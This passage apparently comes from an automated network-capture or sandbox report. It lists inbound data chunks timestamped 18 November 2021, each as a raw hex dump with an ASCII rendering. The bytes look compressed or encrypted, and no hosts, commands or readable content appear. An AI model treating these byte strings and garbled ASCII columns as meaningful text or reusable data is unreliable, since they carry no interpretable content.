                                                                                                                                                                                                  2021-11-18 09:30:32 UTC1115INData Raw: e9 11 43 c1 24 2f 75 2b a3 98 12 33 1a 44 41 ee 0f ad 9d c4 21 d0 ab bc 69 d4 24 5f 98 f2 c6 4a b1 b2 4b 81 03 1e 09 d7 2a ae 31 23 f1 40 3b 62 73 90 22 01 f9 fb 10 02 d9 31 df 25 77 71 b5 a5 11 8b 2d f2 51 95 4e c0 26 78 4c bc 56 b5 cc 41 2f 21 f0 f7 13 84 78 a2 2a f2 15 49 99 71 a8 55 9f 53 8a a9 3c 82 0e 5e d9 27 fe 84 22 21 4e de 31 1c 21 d7 76 85 5f aa 31 47 31 d2 af 04 df 92 95 f4 f9 c4 18 ab e3 27 48 9b 2e ee 03 c4 e2 ea ac 8e a2 0d de 7a 60 01 c1 31 f7 62 33 f0 e2 dc dc bb ef 64 ca 0f e6 4c 21 91 16 c9 64 51 8c d8 ca 4f a8 cc e1 1e b5 53 98 16 f7 b3 4a 5e b9 a5 96 ac 8c c4 e9 01 1e a4 a9 c4 11 49 89 7b bf 2d c6 61 b7 41 11 fe 3a bc ae 9e 12 df be e3 d2 4b fa 34 9c 84 af c2 09 11 77 ab 41 75 16 f6 f1 4d 8e 72 e2 17 01 f3 b3 6f 1c 05 38 22 2f e7 80
                                                                                                                                                                                                  Data Ascii: C$/u+3DA!i$_JK*1#@;bs"1%wq-QN&xLVA/!x*IqUS<^'"!N1!v_1G1'H.z`1b3dL!dQOSJ^I{-aA:K4wAuMro8"/
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC1131INData Raw: b9 0a ac 88 b0 ef 09 de e8 c1 bd b1 b0 e1 58 bf c5 b5 16 1b 13 1f e9 6c f2 73 96 ee 31 2c c1 68 52 11 15 a4 5f 9c 22 f1 98 d8 c1 a8 84 b7 e4 c2 75 21 fc f6 5e 30 64 b0 bb b8 06 b5 ae f2 3f 97 bd 1f 82 1f 21 f9 5f 30 47 c1 90 aa 49 2f 79 88 3b b7 87 e4 80 57 ee 0b 72 df 5f ec 47 55 f7 35 30 59 c7 95 5d b2 54 62 45 4c ed 92 4c 90 3c 4a 64 ae d9 0e 3b e7 26 38 63 4e 9d a9 27 bf 5c 58 85 21 ff bb f3 46 93 ea a7 e4 4c 51 5d 09 df 2f f7 14 4e 27 21 d7 cc 12 26 c6 bf ee 5a d7 ea e3 dd 73 06 20 7b b9 54 97 e7 fe cc 5c c7 95 d7 16 f8 bb b9 22 c0 5a 0a 2c 44 c6 9d dd 96 77 2c f7 3b b4 5a 51 9b 0b 8b 1e 60 7b cf c5 bd 14 f9 d0 a0 ad 4f 84 c1 52 95 99 bb af a0 45 09 8b ef 67 3e b5 0b 21 f7 2b 1e dd ce 11 82 82 55 14 b3 8e eb 13 1e 89 d9 8d 3c 3b 09 8e ef 77 16 17 97
                                                                                                                                                                                                  Data Ascii: Xls1,hR_"u!^0d?!_0GI/y;Wr_GU50Y]TbELL<Jd;&8cN'\X!FLQ]/N'!&Zs {T\"Z,Dw,;ZQ`{OREg>!+U<;w
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC1147INData Raw: 77 25 5b 65 91 65 4e f0 16 f7 52 28 9e da ea 5c 1f 52 12 f0 96 64 ea 01 9f 9c 7d 54 3b 49 be 8a 89 78 fe a2 e9 5f 46 f0 95 89 12 db bb 13 fe 63 ad 31 f4 b6 59 78 5f 24 29 40 2a 74 28 af b7 1e 53 4c 48 8e 4b d9 08 6a 85 37 e9 2c d7 ef 50 a1 46 4e e2 db 96 aa d9 8a 25 a7 6b dc 6b c7 4a 64 a2 fa d3 eb ca c3 4a 12 72 a9 69 4b bb dc ba f7 4a dc f3 1b 92 8c 5b 89 5e c1 09 1a cf 53 32 3c 4f aa 74 2b e3 75 5e fa 64 83 fb e2 b5 84 8b 36 ae e3 22 c4 e7 8b b2 44 96 75 f6 b3 83 22 1c 94 4d 21 71 a7 79 86 a7 dd 14 9a 94 64 73 4a 20 e2 07 92 ad 5e c9 30 64 75 a2 6c 5c 22 5a f3 f8 2d 5e 70 cf 17 a8 77 a5 82 7f 31 f4 a2 c9 76 cd 65 8a 88 cb ce b5 db 5c 95 63 22 4a 62 84 16 39 0e 15 be d1 15 09 d6 26 68 6b 10 54 b9 51 3c 6a dc 90 e6 4f 64 cd c4 a8 4c 9c 5f 01 eb 35 09 12
                                                                                                                                                                                                  Data Ascii: w%[eeNR(\Rd}T;Ix_Fc1Yx_$)@*t(SLHKj7,PFN%kkJdJriKJ[^S2<Ot+u^d6"Du"M!qydsJ ^0dul\"Z-^pw1ve\c"Jb9&hkTQ<jOdL_5
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC1163INData Raw: a5 1c 5c 47 ea 04 80 3e f6 ee 13 d2 99 70 6c 17 9e 17 db dd 0e 4c 60 dc be 71 52 5d 46 da b5 ce 69 27 88 17 7d 4c a1 3e 01 c6 25 0f 54 a3 a5 77 c5 f9 ad d6 cf c5 f1 84 1d ef e9 80 c4 31 d7 fc c6 c1 21 f1 01 d1 2a ea 61 3a 31 df 28 22 d7 ab 62 71 c6 8b 66 50 69 2d e9 c5 e6 fb 21 e1 04 14 f1 06 0b 80 c3 21 51 67 27 cb ad d2 c9 f5 6c 8c 25 e7 28 c5 61 ad 42 f0 7d d9 fd 4d 1c 2b 04 7f c1 40 34 ab b8 46 e2 04 fe 25 50 31 d9 b7 98 30 03 16 95 77 14 22 93 c2 15 bf 2a 41 1c 94 89 c9 32 15 33 16 d6 84 c1 8b 4e 29 d7 cd f4 c8 c9 b9 58 0a 44 b5 ae 9d 80 7a 62 cd e1 7f 14 7e 0b 09 f1 89 d3 6c a3 51 ee f7 01 a3 31 f1 3f bc 17 b5 ab 61 5d c1 90 c2 45 33 96 16 e3 7f 4c 81 02 8b 13 09 f9 31 55 54 d2 52 ab 01 c6 d4 94 15 69 5f 59 bd be 5b ee 62 2b f1 57 d1 4c 4d b4 19 de
                                                                                                                                                                                                  Data Ascii: \G>plL`qR]Fi'}L>%Tw1!*a:1("bqfPi-!!Qg'l%(aB}M+@4F%P10w"*A23N)XDzb~lQ1?a]E3L1UTRi_Y[b+WLM
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC1179INData Raw: 21 f2 df 53 4c 15 39 7a 2e 3c 07 5a 04 fe 31 bf a3 ee 41 bb 3b ea 74 c1 e8 d7 92 f5 00 7e dc 1d c6 5c 49 5b d4 b7 6a 5e b7 93 25 bb 29 3a 79 96 11 ee 28 3f 05 53 ef 2d 35 74 2e 6f d2 24 17 ac b1 ca be 45 91 32 7b 4c 65 dd d4 b1 0f 80 c1 3f 89 8b 1a bb f5 09 ba ff e6 6e 5a ce fa 2d 58 0d 84 2a b9 c9 8e 3d 1c 21 c0 66 53 e9 23 99 56 cb f1 8a 15 53 d3 cb c6 fc 48 cb f1 c7 1f 09 65 78 0f 4f cf a1 54 2a cb b7 29 49 f8 6b 77 8b 81 7c 34 27 55 14 69 25 01 c7 5d 33 61 cd e3 a1 22 64 8a a4 dd 59 03 92 ff 56 b0 16 ab b2 01 d6 34 97 aa e6 ae 40 2b 89 bd 01 3b 31 ce 01 da 7f 59 08 62 09 de 75 46 6b 2d e7 c5 14 01 94 56 12 c3 b2 9c 42 cc 21 0e 02 8f 03 e9 1e 5c 5d 59 ef 2e f6 02 28 ce 53 d6 36 c2 36 ef 5f 14 df 82 cd 6c cb 81 d7 21 25 d2 c9 ea d1 f8 2b 31 4a 31 c8 68
                                                                                                                                                                                                  Data Ascii: !SL9z.<Z1A;t~\I[j^%):y(?S-5t.o$E2{Le?nZ-X*=!fS#VSHexOT*)Ikw|4'Ui%]3a"dYV4@+;1YbuFk-VB!\]Y.(S66_l!%+1J1h
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC1195INData Raw: fa db 17 51 0b 00 87 9d d2 ea 52 9c 4e 6b 52 77 ba 91 24 29 32 bd fb 8e 2a 1c 25 76 98 52 74 cf ef 5e 27 41 05 ea 15 ee f3 77 48 ae 4b 9d 0e 6b ca ae 16 3c 03 67 54 c4 f6 af ec 41 e4 e8 1f c6 f6 9d 7a 97 b2 0b 5a 73 5e a8 8b 07 15 c6 67 44 89 a9 c5 82 2d 5a 49 95 db 51 25 cc b5 49 6d 65 84 e6 64 ec 5c a7 e9 d3 0f 10 45 84 c6 15 23 e6 fd 54 1e 65 d2 f3 13 4b 16 e4 a2 a1 93 bd c2 f4 e8 a7 c9 90 71 02 64 ea fa d9 e1 a5 7f 65 71 0a f6 04 2d ad fe 04 e4 49 e8 7c a5 ae dc 38 18 9f 6e e5 a2 bc ff c5 be 13 06 af 77 b5 a2 1e 31 77 74 81 69 89 26 76 ef eb 2b 57 7d 94 94 95 d4 ca 47 29 c9 dd 6c 9b 4e 9c 31 ae f7 64 11 8a 11 3c 6d c4 31 df bb e8 af cb d7 78 6a 97 dd b3 90 4a aa 28 f1 89 5b de c5 6d ec 1e d2 c7 f1 85 63 f2 22 93 fb 62 83 3b 50 4a 9c 60 52 62 f9 e6 1b
                                                                                                                                                                                                  Data Ascii: QRNkRw$)2*%vRt^'AwHKk<gTAzZs^gD-ZIQ%Imed\E#TeKqdeq-I|8nw1wti&v+W}G)lN1d<m1xjJ([mc"b;PJ`Rb
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC1211INData Raw: 32 55 14 77 85 32 2e 0d 29 60 5e 01 d7 4f 5a bc 56 b7 0a 01 d7 5f 7c 05 68 59 9d ed 3f fd f8 79 05 80 f4 1b 7c 5d fa dc 2a 50 02 52 ba 1e 45 f8 55 fd 46 e9 7f 3c cf 43 56 65 8b 34 fc 2a 88 c6 4e cb ee fb 8b a5 f5 10 48 56 51 1f b9 ee 26 e5 f7 ca fb 55 ab 50 f5 32 4c f6 9b 03 25 21 ee 3d 30 41 51 a9 b8 f3 31 2f b6 1a d6 60 6b df 1c 68 03 53 bb 73 a0 f7 7f e0 f3 4b 84 e6 2b 02 57 bf 1e c9 fe 1f f7 c0 3d f7 d3 c0 04 43 81 c3 68 13 3b bf 6b 1c eb bb 13 c2 a8 b1 2f 5b 69 9e 89 2f a8 7b b1 50 68 08 58 7d 29 e7 7b e6 a5 67 0c 52 1d a6 ec 73 90 28 1a 66 6e 08 f8 e5 94 57 c9 56 ec c4 8b ab 39 f6 7b b7 a7 5e ca 9e 14 87 1c 44 00 55 bd 37 59 ae 3f c1 12 ed 07 45 01 00 38 a4 80 ff 7b b0 44 57 a0 4c 60 5b 3e bd 5f 31 c1 d8 e9 81 ca 80 0b 5d 56 be 22 bf 63 40 fa f1 42
                                                                                                                                                                                                  Data Ascii: 2Uw2.)`^OZV_|hY?y|]*PREUF<CVe4*NHVQ&UP2L%!=0AQ1/`khSsK+W=Ch;k/[i/{PhX}){gRs(fnWV9{^DU7Y?E8{DWL`[>_1]V"c@B
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC1227INData Raw: b1 48 de 7f e4 0b 25 97 45 87 ab 2d 49 cc ab 97 99 ba 48 09 6a cb a0 4e 64 b5 89 3e 6e 8b 4c 51 b4 38 91 f2 41 24 01 fb 28 c9 9c b4 22 52 09 c1 ce 8d b5 6e 6e 48 be 7f a4 91 c9 ef 40 3c 8a a5 42 a3 16 21 fe ec 33 77 c2 b5 32 87 04 48 5f bf c2 48 d6 d5 1a 93 5f 41 6d 44 47 1a d9 e2 0d ee b1 52 bb a1 50 07 05 58 11 7a c9 40 e6 02 b6 0f 42 0f b6 d5 fb c7 1a 77 0a f7 6c 6b 9f c6 fb 25 29 ce 92 52 f5 81 c9 fb 89 e9 2c d3 c4 21 cb fe f2 13 3c 31 09 01 f2 ba e4 3b 69 09 22 46 41 ed dc fb 29 4b fa fe 8d 10 e3 ea e8 71 da a2 7c b0 1e 95 f1 b2 93 ca 33 e9 38 2c fe f0 b6 5b 7e 8c 5e e3 61 82 f6 a8 7e 28 99 05 51 68 05 7f cb cc 12 09 d8 a6 25 76 44 28 0d 4a 30 71 71 8a 1f 38 e7 d3 b8 33 14 05 64 46 2d c7 db 95 a0 3c 90 a0 cb 30 3b 14 1a 44 8b 29 4e f8 f2 7a 8b d8 40
                                                                                                                                                                                                  Data Ascii: H%E-IHjNd>nLQ8A$("RnnH@<B!3w2H_H_AmDGRPXz@Bwlk%)R,!<1;i"FA)Kq|38,[~^a~(Qh%vD(J0qq83dF-<0;D)Nz@
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC1243INData Raw: 90 30 f8 03 cb 43 2d 5c cf 58 09 f0 a4 3f 25 0d 04 ba 5e 5e f7 62 e3 0f 22 89 de fd 4c 69 50 b8 14 31 72 c3 12 cb 21 d3 72 f3 f3 98 af 27 07 13 74 71 31 ab e3 4e 28 24 31 4e c0 ab 44 cd f3 11 ab 28 e4 29 27 f6 2d 11 ee f3 6b b6 ee 14 eb 8b 4a 2d c8 54 a8 12 f3 ad 71 8f ee 11 44 b5 f8 2d 35 9c e5 7b 21 2d 06 01 f0 21 4e 38 27 6b 96 98 37 31 6d 31 d3 d9 f8 2e 31 e5 88 ca 2f 98 0e eb 99 5e 96 fe ba 16 9a ab cc d1 eb a4 c2 b5 78 9e 7f 01 52 35 a1 25 2d 7d 12 ec 6b e9 aa c3 d7 42 a7 12 3e 77 e0 c3 cb 99 b7 94 1d 98 f7 4e 10 ac 46 5a ef 34 ec eb 31 d1 c3 33 42 6e d0 5d 39 39 2d 68 da 8d 0b 3e 2e ed c5 89 f7 16 26 bc cc 42 0d 65 5e 02 50 35 dc a1 2b 13 6a 98 89 e6 4e ac 8e d3 26 02 38 c9 d9 21 ac 1f 25 e5 db 24 aa 27 c6 c8 05 8a 09 80 e9 b0 fe 21 ca e0 01 7c 3b
                                                                                                                                                                                                  Data Ascii: 0C-\X?%^^b"LiP1r!r'tq1N($1ND()'-kJ-TqD-5{!-!N8'k71m1.1/^xR5%-}kB>wNFZ413Bn]99-h>.&Be^P5+jN&8!%$'!|;
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC1259INData Raw: b0 0b 80 0f b6 48 02 ef 9d 66 c3 6b f7 44 2d 99 f6 9f 09 79 2d d1 d6 a0 c4 cf 22 2b ab 27 66 5a 45 ac 6e b6 b2 4a be c8 e2 09 52 fb 65 5b 31 fd eb 28 54 30 26 6c 6d 21 c9 49 08 c2 69 a5 75 c4 57 68 03 39 08 0a 01 c7 6b 8c 29 fb 4b eb 42 68 27 cb 19 67 38 17 c2 e1 75 a5 31 63 21 45 f1 45 5d 6e 91 18 ac 04 31 d3 89 c1 ab b8 b5 de ac 9c 01 5f 33 e4 5d b9 4c f2 ff 25 bb 0a 31 d6 d2 10 33 02 31 b5 73 fc 3c 24 d9 73 0e 21 f9 89 fa df e6 8e 5e f1 b8 61 d0 64 4a d8 69 21 5c f3 a3 5e ff 29 7a 72 c8 31 09 26 f2 15 09 d9 a8 11 29 cb c1 07 21 17 39 b9 d6 65 62 aa 8c d7 b8 bf d4 73 50 31 f0 bc 74 90 13 89 d7 04 5c 16 bf ec ef b4 a2 2d 64 81 eb fb a4 10 01 13 de 31 ce ee 61 cf c3 38 41 19 de 25 a5 fa ec 4a b3 16 03 31 de 2b 13 5b 5a e9 82 85 e7 8b 29 06 12 68 0d 98 ab
                                                                                                                                                                                                  Data Ascii: HfkD-y-"+'fZEnJRe[1(T0&lm!IiuWh9k)KBh'g8u1c!EE]n1_3]L%131s<$s!^adJi!\^)zr1&)!9ebsP1t\-d1a8A%J1+[Z)h
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC1275INData Raw: ca d5 02 22 0b c4 8a 0e a9 49 d3 e8 4d a5 81 66 80 e9 3a e1 3e dd fe 3f d8 2f 0a bb 85 09 f2 fc 6e d7 e0 08 8e 9e 3f 27 5d e6 5c 95 7d 18 74 80 ea 7b 3b 17 fe 31 c6 72 90 ce 57 4c 13 b7 61 7a fe 67 b9 10 ee ac d0 6c 17 29 d6 ac 6d 4e bb c9 8c 2b ee 29 23 d9 39 38 33 b2 c6 c7 b8 25 5e 09 61 f6 09 ce 6f 34 99 ee ed 2d 7e 97 57 94 ed 9a e4 b1 ea 6d 42 2c 70 e4 31 da ce 30 11 2b 07 39 51 9c 20 5f 80 84 2e a2 00 92 a9 c6 d3 a9 7d 91 dc 4b ed a5 d2 af 57 54 e9 3d a4 fb 4a d8 28 39 eb 66 d9 b4 09 69 51 0f 45 3c e2 33 92 17 20 be 13 11 53 f3 b3 44 4b e4 da 1c 9f 96 8f bd cc d5 65 03 44 f7 fa a3 5c 93 af 21 e2 f7 c5 55 30 b4 d7 1c 95 16 76 f8 be b6 07 53 48 f2 26 e5 bf 34 19 ef 32 da c7 5d 47 e2 3b 2c 30 17 e5 01 a8 1d b4 aa d9 fa 7b a8 9c 39 21 4b ad 85 cb ac 14
                                                                                                                                                                                                  Data Ascii: "IMf:>?/n?']\}t{;1rWLazgl)mN+)#983%^ao4-~WmB,p10+9Q _.}KWT=J(9fiQE<3 SDKeD\!U0vSH&42]G;,0{9!K
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC1291INData Raw: cb ce dd 18 54 03 3a bc 05 c4 ef 8d 54 f1 dc 59 8d 0c a7 01 ed 6b 34 b1 ae e8 b8 5b 31 87 8b 1a 44 83 bc f6 d7 33 f9 f6 16 57 e6 68 a3 6f 7c 5b 02 8a 16 1b 33 1a 20 5a 34 34 50 ee b1 62 0a a8 28 1c 55 f6 09 5b fe 30 96 2b 1a 31 51 d6 5b a0 54 e6 ed 3a ac 83 d2 a6 51 10 c2 ea 89 ee 9a e6 e6 c0 82 8c a1 53 02 34 cc 2a be 72 49 ce 92 be f8 b3 3a de 21 0b 0f be fb 7d e6 83 4e d6 61 2c ee 99 69 16 88 05 bb 0d bf fb 31 50 d2 60 ad e6 3c be 18 52 d6 8c 92 6d 2d 30 04 94 ab 35 07 ae a1 d3 3a 22 4e 33 5c 41 52 dc fa c4 f7 99 1e 05 a3 ad ad d4 30 48 77 90 47 22 95 f0 3a 2d e9 30 c5 ab 35 5a f8 d0 d6 fe 39 5c 1d 96 5d 5d 4d 24 bd 66 3d ce 12 ef 8b cd 00 2b ad aa 9e 13 04 e2 b4 84 8a 06 a3 84 07 34 1e 2c 53 24 75 ae a9 45 dd 93 3b a6 63 2d 67 47 96 10 40 d3 b7 58 4b
                                                                                                                                                                                                  Data Ascii: T:TYk4[1D3Who|[3 Z44Pb(U[0+1Q[T:QS4*rI:!}Na,i1P`<Rm-05:"N3\AR0HwG":-05Z9\]]M$f=+4,S$uE;c-gG@XK
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC1295INData Raw: 79 38 ff d3 68 4b af d9 a9 31 ed 37 4b 12 c7 ea 64 21 95 8e f7 09 4c 7b 48 8e 40 c4 31 bc e9 c1 80 f2 cc 35 9b 78 64 dd 89 b6 c1 74 e6 6d f4 a7 66 f8 ac 95 e6 31 c9 98 21 d7 c6 31 17 0f b7 c1 49 d1 de 5f 71 d7 e9 1a f3 c3 17 5a a2 35 01 aa a1 d0 3e ac f9 a5 98 1b 01 25 c1 9c 89 5f 5f 5b 1f 45 50 52 66 e3 1e 25 35 13 1c ec a8 73 cb 2d e4 42 4f f6 ef 65 42 a9 b7 92 36 cd 2c b7 76 20 e4 54 8b 6a 13 e6 ac 2d ed 5c 7b 75 89 35 3f cd 07 22 ed 4b 8a 4e 6b 1c 59 e9 4a c1 49 de 1b 5b 53 a0 3c 48 2b 5d 2d 4e ea 2c 67 e6 9d 76 6d e2 31 cf d3 2a 96 3b b2 d2 9f 09 cf 49 e6 d0 5a f7 fe 62 26 ac d6 e8 6b 7e da 6c 30 d7 9d fc bf 72 fc 02 6b 74 ec 25 55 c2 5c dc d2 5a df 99 2c ff 42 36 be 29 f0 98 c4 6c cf 63 e2 d6 97 8d 2a 3e 0c a6 df 34 21 ec 31 9f e6 1c bd 74 30 cf a9
                                                                                                                                                                                                  Data Ascii: y8hK17Kd!L{H@15xdtmf1!1I_qZ5>%__[EPRf%5s-BOeB6,v Tj-\{u5?"KNkYJI[S<H+]-N,gvm1*;IZb&k~l0rkt%U\Z,B6)lc*>4!1t0
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC1311INData Raw: d5 d3 b8 bb d5 d1 26 c3 29 69 89 f7 0b 7a d5 39 12 45 7a 2c b5 e6 4a 1c b2 40 c4 f3 ac a8 19 a3 03 0b 5e cf 31 cb b3 76 bc ef ec eb 96 17 78 a3 26 7a 9f f3 fd 89 f6 75 51 36 bf 26 dc e4 72 5e d4 22 63 27 e3 3b 14 0d 2f 01 df 4c 37 bd d0 21 b6 a2 60 21 c3 2b 01 9e f2 31 1c eb 28 2b ca 1a 65 68 bf bc 70 b1 31 fb 2a 8d da 04 b5 f3 c4 5c 75 5a 9d f8 18 ea c3 a2 e3 68 fd f6 02 aa 39 56 b5 92 ac b2 56 d7 a3 11 2d db 09 6c 1c 94 95 99 8b 01 2b ed 26 92 d8 59 30 b5 16 f6 4e e8 e3 cb 12 05 c5 ac 80 b2 f7 a9 7a 9a e9 04 bb 8a bd 72 d6 b2 24 17 34 fd 21 13 d8 01 29 39 d2 81 98 f6 39 72 59 89 04 c5 41 3b 53 7e 5b 95 ce ae 9a e8 12 ce 67 a8 c3 b4 16 2a 13 3d 12 fc 74 ba aa f3 83 59 ab 29 f1 ea 1e 09 25 f5 14 09 82 92 57 96 43 c5 2c 21 f6 fd e5 c8 0f 49 1a 9e f7 ba 6e
                                                                                                                                                                                                  Data Ascii: &)iz9Ez,J@^1vx&zuQ6&r^"c';/L7!`!+1(+ehp1*\uZh9VV-l+&Y0Nzr$4!)99rYA;S~[g*=tY)%WC,!In
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC1327INData Raw: 4b f8 38 4a 85 4c e2 93 d7 ff 37 f2 25 fe 56 1f ef dd 12 6b a3 9f 4c 64 27 fe d5 b3 f1 5a 72 e9 66 96 cd 9e f1 9c 4c 92 01 5b d6 ae 65 ff b3 f8 5e 24 b9 49 34 dc 59 bd 48 63 42 01 de 5f 5c 86 cb 58 5e 9f 94 02 bf ec c2 5b de 8c aa 8b 5f 1f cd f3 af f0 74 5c 72 76 c0 69 d7 82 95 33 1f dd da 9e 25 c6 28 45 d8 a5 66 b5 24 ce 0f 2e c2 e6 75 23 03 1f d2 c6 b2 f9 d4 33 cb f6 71 69 55 db db a5 f6 a5 c9 79 46 2f d4 88 96 8b 99 0b e5 02 68 03 c1 89 d7 09 df 2d c0 df c7 e9 49 31 fe 49 c7 66 78 bf f1 86 92 f7 b8 7c b7 b4 be cb d5 1a 8a 06 6e 5d 4e ef 24 ce c5 c6 6b ff 1e 66 5b 91 ca ee 58 ae 6b f8 5d 96 db 7e 2b a4 d2 74 01 b5 d4 82 c8 ba 0b 33 17 7b 5e 93 0f a2 71 97 ed 11 48 ef 85 34 a1 be a6 1c 4a 8c 33 02 93 b0 ad df 94 ef 85 eb 2d c6 cd ec 45 a4 3d b5 51 04 92
                                                                                                                                                                                                  Data Ascii: K8JL7%VkLd'ZrfL[e^$I4YHcB_\X^[_t\rvi3%(Ef$.u#3qiUyF/h-I1Ifx|n]N$kf[Xk]~+t3{^qH4J3-E=Q
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC1343INData Raw: 6b ca 99 4b a3 c1 4d c8 5a 2d 8e 09 b7 a5 a2 46 ae 28 05 5d 27 16 fe 8b 18 b9 77 93 ee 62 86 68 d6 59 52 94 23 89 a7 76 73 ad 50 b3 33 76 18 53 fe 23 4a a5 d5 3e 99 08 04 52 ae e7 29 69 0a 45 d8 12 05 ac 97 b5 9c 6b ee b7 54 59 52 75 c6 50 7b 18 5f af a8 e6 17 cf bf 99 f3 e6 99 4f f6 2f bc 2e a5 c8 ea 05 b7 11 b8 18 3f ca 67 20 21 52 ff e0 97 e3 4e 72 59 d6 35 9d ed 1b da c3 c6 11 9d e6 45 92 35 15 09 a1 05 98 6d 08 e9 4f 43 8a 08 4b b3 98 64 42 cf ef bc d2 a5 62 67 f6 e2 cb 0b f4 65 c6 bf ce c9 0a 93 d9 11 f2 02 89 21 5e 26 7a fd c2 c0 d7 5b 31 bb 5d f9 85 ef 1c dd f3 05 f8 e7 53 5f 56 be ba d9 6b 6e a3 89 49 0e 5e 9d 0d 6a f9 bc 97 ac 99 5f ca 84 25 01 ec 19 bf f2 4b bd 9c 4c 4b 04 cb 61 13 c6 dc b2 72 93 fc 52 72 b7 56 2d c5 9c 76 49 28 b5 6e 46 4e 29
                                                                                                                                                                                                  Data Ascii: kKMZ-F(]'wbhYR#vsP3vS#J>R)iEkTYRuP{_O/.?g !RNrY5E5mOCKdBbge!^&z[1]S_VknI^j_%KLKarRrV-vI(nFN)
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC1359INData Raw: f1 dd 9b 02 df 20 29 55 44 2d 28 66 29 89 b5 70 a2 e4 c0 bc fa c7 d8 89 d5 f2 b8 b6 fe 51 e7 09 68 c3 d4 34 69 c8 42 5c 59 b0 8b c3 2e 94 d8 a2 3f ee 8f 29 0d 80 f2 82 9c 86 84 16 b2 13 f9 fd 09 21 31 d7 53 f1 83 89 c8 01 f3 f8 f0 8b 33 b7 5e 74 4b f5 c2 21 4e 46 2c c2 87 e4 c4 32 b3 04 34 c7 36 f3 cb 4a 8a 86 41 17 3b af 31 a6 32 2d 63 f3 49 2c c4 03 33 e2 12 41 c2 a7 22 5c 2d c2 c3 50 8e 43 d7 d8 54 ea 97 d1 db 89 09 c1 32 4f 83 8a 29 32 50 28 4e b9 e1 15 72 43 e1 46 10 02 32 49 94 a3 12 31 40 ab ef b8 4b 01 28 13 66 f6 37 90 03 80 24 21 ca 9d db ce ab 44 88 c7 24 48 71 a5 af 71 1c 93 d0 c2 31 ee 09 46 49 2f 09 ba 75 ba 8c 62 42 51 2e 26 8d 00 0f b6 d1 89 16 2d c9 17 80 89 10 5f 53 19 2d b1 17 f7 28 fa c8 87 a6 77 2f 71 d4 8b 31 cf 5c 1e 59 e9 da d5 91
                                                                                                                                                                                                  Data Ascii: )UD-(f)pQh4iB\Y.?)!1S3^tK!NF,246JA;12-cI,3A"\-PCT2O)2P(NrCF2I1@K(f7$!D$Hqq1FI/ubBQ.&-_S-(w/q1\Y
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC1375INData Raw: 2d 4e 15 93 a8 fe b1 e6 45 32 a4 93 a7 26 2b e6 a1 15 68 13 5e ef 0b 28 01 ba 49 1b 3e f2 11 dc cc 52 25 e5 e6 af 39 0e 3e bc c4 c9 99 96 b2 7c 21 a4 28 c9 91 f6 fd 65 e3 b5 6e 94 11 c4 f9 76 27 3e 98 62 9d 7f 09 dc f4 22 e8 2b b4 f5 ee 35 82 be a3 be 93 17 40 b9 b4 85 ee 02 bc 51 e2 9c e5 f9 8a ee 1c 96 ce 53 b3 3e 52 75 25 67 9a 38 66 91 9d f3 64 89 e6 ac d9 df 64 ce 99 2d a7 cb 5d c7 de 97 d6 ab 3d e0 65 fb 4b 52 5b 8d 80 ed 29 3e 64 25 fb 57 ad 35 a3 ab 64 87 52 dc f9 4c d0 60 46 0e 45 e0 ea 57 51 88 c4 1c cb 0c 69 44 77 5b 0a 1e 89 2d d3 79 92 63 36 dd d7 97 ba 69 39 96 de 4c 0e ce 4b 04 ca 84 4a 17 c9 8e c4 5a f2 4a d6 17 e2 ba 8d 1b cb cd bb e2 98 da 1a ff 52 79 2d ce 64 e5 c6 1d 21 a9 1a 94 ce 18 25 75 9c a8 82 58 75 7c 51 2d 53 24 af f9 b9 64 21
                                                                                                                                                                                                  Data Ascii: -NE2&+h^(I>R%9>|!(env'>b"+5@QS>Ru%g8fdd-]=eKR[)>d%W5dRL`FEWQiDw[-yc6i9LKJZJRy-d!%uXu|Q-S$d!
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC1391INData Raw: 5f 4f 12 bd 23 87 c2 07 0b f1 52 48 fd 6b 04 6e 02 ad 25 89 c9 29 fa fe fa 7b a2 e8 f1 43 89 c1 dc e5 ab 0d 89 18 4c af 0c dc 16 52 56 3e 62 ef be 11 f1 a5 70 5b e1 af 53 72 12 c6 cd 38 3e a1 fc 70 6d 80 b9 1b 62 09 ff 5f 7c 3c cf 4b ce 5f cc f2 bd 90 20 eb 82 9f e4 59 4b 3b 34 01 45 d3 f7 64 f8 67 b1 c2 32 6f 29 23 2e c5 8b bc fb a1 01 c7 6b cc a4 8a 4f 02 87 0d c9 46 f0 c4 de 2c 82 ba d9 09 28 69 93 ff 8d a6 28 98 2f 8b d6 05 45 f9 bb e3 78 3c f1 4e 28 74 e7 52 65 e3 d4 ed 4e 8a b1 41 83 a8 a7 2b 9d 96 a0 9f 7c 46 6b 75 09 2d 79 d2 47 21 ea 5d bb a8 f7 82 bf 54 0c c9 55 88 b5 bc 09 e7 8b f9 33 62 f7 68 dc 6e 58 c2 95 88 8b 1a 95 ee 93 b5 13 59 b4 c8 ee e9 5e 40 35 11 84 22 2d f5 8e 8e 01 df 49 de dc c4 c2 c2 76 6c 9e 98 20 86 41 4a 9c 31 28 ef 01 62 aa
                                                                                                                                                                                                  Data Ascii: _O#RHkn%){CLRV>bp[Sr8>pmb_|<K_ YK;4Edg2o)#.kOF,(i(/Ex<N(tReNA+|Fku-yG!]TU3bhnXY^@5"-Ivl AJ1(b
